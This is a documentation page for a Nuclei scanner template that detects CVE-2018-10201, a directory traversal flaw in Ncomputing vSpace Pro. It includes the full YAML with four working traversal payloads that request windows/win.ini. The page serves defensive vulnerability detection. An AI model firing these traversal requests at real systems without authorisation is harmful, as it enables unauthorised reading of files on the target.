Ncomputing vSPace Pro 10 and 11 - Directory Traversal
ID: CVE-2018-10201
Severity: high
Author: 0x_akoko
Tags: cve,cve2018,ncomputing,lfi,packetstorm
Description
Section titled “Description”Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability.
YAML Source
Section titled “YAML Source”id: CVE-2018-10201
info: name: Ncomputing vSPace Pro 10 and 11 - Directory Traversal author: 0x_akoko severity: high description: Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability. impact: | Successful exploitation of this vulnerability allows an attacker to read arbitrary files from the target system. remediation: | Apply the latest security patches or updates provided by Ncomputing to fix the directory traversal vulnerability. reference: - https://packetstormsecurity.com/files/147303/Ncomputing-vSPace-Pro-10-11-Directory-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2018-10201 - http://www.kwell.net/kwell_blog/?p=5199 - https://www.kwell.net/kwell/index.php?option=com_newsfeeds&view=newsfeed&id=15&Itemid=173&lang=es - https://support.ncomputing.com/portal/kb/articles/ncomputing-health-monitor-server-vulnerability-patch classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-10201 cwe-id: CWE-22 epss-score: 0.04525 epss-percentile: 0.91637 cpe: cpe:2.3:a:ncomputing:vspace_pro:10:*:*:*:*:*:*:* metadata: max-request: 4 vendor: ncomputing product: vspace_pro tags: cve,cve2018,ncomputing,lfi,packetstorm
http: - method: GET path: - '{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini' - '{{BaseURL}}/...\...\...\...\...\...\...\...\...\windows\win.ini' - '{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini' - '{{BaseURL}}/....\....\....\....\....\....\....\....\....\windows\win.ini'
stop-at-first-match: true matchers: - type: word part: body words: - "bit app support" - "fonts" - "extensions" condition: and# digest: 4a0a004730450220538e713a4f682f7d5029f56e06f0681b94ad80c53d0f6cee709a58a38b510643022100d087739d8950929a9b1070c1048bd4accfb891615d00901ed3f54334c83293b9:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-10201.yaml"